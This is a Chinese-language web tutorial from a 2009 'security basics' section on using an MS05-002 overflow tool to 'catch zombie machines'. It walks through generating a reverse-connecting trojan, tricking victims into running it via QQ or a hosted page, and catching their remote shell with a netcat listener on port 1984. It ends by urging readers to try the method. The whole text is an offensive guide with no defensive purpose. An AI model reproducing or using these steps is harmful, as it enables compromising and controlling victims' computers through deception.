当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 黑客如何利用Ms05002溢出找“肉鸡”

安全基础
论附加码在网络安全中的作用
未登录主域,如何修改密码
网络防“虫”和全局安全网络应用
如何解决dllhost进程消耗CPU100%的问题
很巧妙的进程防杀方法
QQ安全问题完全解决方案(1)
QQ安全问题完全解决方案(2)
一次艰苦的病毒查杀过程
使用虚拟机测试你的补丁
误将Foxmail密码忘记之后
防泄密从Word开始(1)
防泄密从Word开始(2)
防泄密从Word开始(3)
防泄密从Word开始(4)
实况无线网络安全—简析无线安全实施策略
十大绝招轻松制服顽劣的间谍软件
防范DDoS攻击和全局安全网络的应对能力
个人电脑的安全防护
判断你的用户是否真的被黑客攻击(1)
判断你的用户是否真的被黑客攻击(2)

安全基础 中的 黑客如何利用Ms05002溢出找“肉鸡”


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 73 ::
收藏到网摘: n/a

 

  溢出攻击永远是安全界中,不可忽视的角色。而如今也正是肉鸡短缺的年代,能掌握一门最新的Ms05002溢出,必定会让你有“惊人”的收获。至于熟练的溢出如何炼成?具体方法请见下文所示!

  实施方法:通过Ms05002攻击工具,溢出反弹IP、反弹端口,会生成含有木马性质的文件。然后将这个产生的文件,以QQ传输的形式发给受害者观看,或者将其上传到自己的主页空间,引诱其他人访问。最后执行NC瑞士军刀,监听本机端口,收取已经运行产生文件的主机。

  步骤1.首先从网上下载Ms05002溢出工具,释放到比较理想的硬盘驱动器中,然后在CMD命令行下,输入软件名称启动该程序,会出现一些英文形式的帮助信息(如图1)。

  小提示:Ms05002溢出工具,是一款需要在命令行下支持运行的程序,它可以通过溢出反弹的IP地址,生成木马服务端。这点与其他溢出程序是完全不同,而且效率相比之下,也有明显的提高,真不愧是即所有溢出程序的升级版本。

  步骤2.继续在其下的命令行处,输入命令Ms05002 要生成的木马文件名 本地机器IP地址 溢出端口(如图2),然后敲击“回车键”执行。屏幕会不停的向上滚动,这时还会出现带有两句“OK”的字母提示,说明木马文件已经生成完毕了。



图 2

  步骤3.通常溢出过后,都需要监听工具来抓捕肉鸡。这里也不例外,跳转到事先准备的NC工具所在目录,然后在其命令行处输入NC –VV –L –P 1984的监听命令,并敲击“回车”键,开始监听本地1984端口的信息出入。

  小提示:NC监听软件-VV参数代表,得到更详细的输入监听内容。-L代表连接端口关闭后,仍然继续监听。-P进行监听本地端口,后跟数字就是所要监听的端口号。

  步骤4.将溢出生成的木马,以QQ形式发给网友运行,或者上传到自己的个人空间中,骗取受害者浏览运行。如果用户不幸查看所发去的木马,正在本机监听的NC等待状况,就会改为可操作命令行(如图3)。而此时的命令操作平台,也正是远方主机的SHELL平台(有关SHELL的解释,已经在前几篇文章中叙述过,这里就不做过多讲解了),现在你就可以在其主机上,为所欲为的以命令形式操控机器。



图 3

  结束语:最快捷和最灵验的“抓鸡”方法,已经摆在您面前了。还在犹豫什么?赶快前去一试此妙法吧!